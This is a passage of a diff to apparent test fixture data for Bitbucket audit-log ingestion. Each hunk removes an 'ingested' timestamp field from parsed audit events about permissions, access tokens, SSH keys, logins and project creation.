AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== 
schacon@mylaptop.local\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshaccesskey.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":141000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5312,7 +5244,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020822241Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"5\",\"name\":\"access-token-user/2/1\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_ADMIN\\\",\\\"user\\\":\\\"access-token-user/2/1\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036263,\"nano\":970000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5404,7 +5335,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongranted", - "ingested": "2021-12-24T00:37:41.020822969Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"5\",\"name\":\"access-token-user/2/1\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_ADMIN\\\",\\\"user\\\":\\\"access-token-user/2/1\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036263,\"nano\":975000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5496,7 +5426,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokencreated.repository", - "ingested": "2021-12-24T00:37:41.020823798Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token created\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokencreated.repository\",\"area\":\"SECURITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_READ\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"ddddd\\\",\\\"permissions\\\":[\\\"REPO_READ\\\"]}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"ddddd\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036264,\"nano\":6000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5587,7 +5516,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.repository", - "ingested": "2021-12-24T00:37:41.020824526Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.repository\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddddasdf\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"dddddasdf\\\",\\\"permissions\\\":[\\\"REPO_ADMIN\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036272,\"nano\":296000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5678,7 +5606,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokendeleted.repository", - "ingested": "2021-12-24T00:37:41.020825273Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token deleted\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokendeleted.repository\",\"area\":\"SECURITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddddasdf\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"dddddasdf\\\",\\\"permissions\\\":[\\\"REPO_ADMIN\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036275,\"nano\":945000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5769,7 +5696,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissionrevocationrequested", - "ingested": "2021-12-24T00:37:41.020826011Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission remove request\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissionrevocationrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":255000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5861,7 +5787,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissionrevoked", - "ingested": "2021-12-24T00:37:41.020826833Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission removed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissionrevoked\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":288000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5953,7 +5878,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeydeleted", - "ingested": "2021-12-24T00:37:41.020827626Z", "original": "{\"affectedObjects\":[{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted SSH access key from profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeydeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":2,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":4,\\\"name\\\":\\\"09e096ea84245cc5\\\",\\\"slug\\\":\\\"09e096ea84245cc5\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"09e096ea84245cc5\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":298000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -6059,7 +5983,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshaccesskeyrevoked.repository", - "ingested": "2021-12-24T00:37:41.020828364Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"SSH access key deleted from repository\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshaccesskeyrevoked.repository\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"}\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"key\\\":{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"},\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"repository\\\":{\\\"id\\\":1,\\\"slug\\\":\\\"test2\\\",\\\"project\\\":{\\\"id\\\":2,\\\"key\\\":\\\"TEST\\\"}}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== 
schacon@mylaptop.local\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshaccesskey.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":298000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -6135,7 +6058,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020829108Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036295,\"nano\":112000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -6202,7 +6124,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020829855Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036310,\"nano\":261000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -6281,7 +6202,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020830595Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:07.312Z - 2021-11-27T18:05:10.261Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"29 - 228\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036310,\"nano\":321000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6346,7 +6266,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreationrequested", - "ingested": "2021-12-24T00:37:41.020831336Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project creation requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":308000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6426,7 +6345,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020832066Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":315000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -6498,7 +6416,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020832811Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":316000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -6593,7 +6510,6 @@ }, "event": { "action": "bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated", - "ingested": "2021-12-24T00:37:41.020833539Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project branch model created\",\"actionI18nKey\":\"bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Feature prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.featureprefix\",\"value\":\"feature/\"},{\"name\":\"Development branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.developmentbranch\",\"value\":\"(default branch)\"},{\"name\":\"Hotfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.hotfixprefix\",\"value\":\"hotfix/\"},{\"name\":\"Bugfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.bugfixprefix\",\"value\":\"bugfix/\"},{\"name\":\"Production branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.productionbranch\",\"value\":\"(none)\"},{\"name\":\"Release prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.releaseprefix\",\"value\":\"release/\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":333000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
